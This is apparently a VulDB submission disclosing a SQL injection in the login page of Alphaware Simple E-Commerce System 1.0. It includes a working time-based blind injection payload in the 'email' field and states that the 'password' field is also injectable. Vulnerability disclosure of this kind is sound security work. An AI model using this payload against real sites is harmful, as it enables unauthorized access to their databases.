| Title | Alphaware Simple E-Commerce System Login Page SQL Injection |
|---|
| Description | A SQL Injection Vulnerability has been discovered in Alphaware Simple E-Commerce System, and the vulnerable function is login. Attackers can exploit it by sending crafted request, the injectable parameters are 'email' and 'password'. A time-based blind injection poc is below:
POST /alphaware/ HTTP/1.1
***********************************
email=test1%40test.com ' AND (SELECT 6077 FROM (SELECT(SLEEP(5)))dltn) AND 'PhRa'='PhRa&password=123&login=Login
The parameter 'password' is also injectable |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 03/20/2023 07:21 (3 years ago) |
|---|
| Moderation | 03/20/2023 08:28 (1 hour later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223408 [SourceCodester Alphaware Simple E-Commerce System 1.0 email/password sql injection] |
|---|
| Points | 20 |
|---|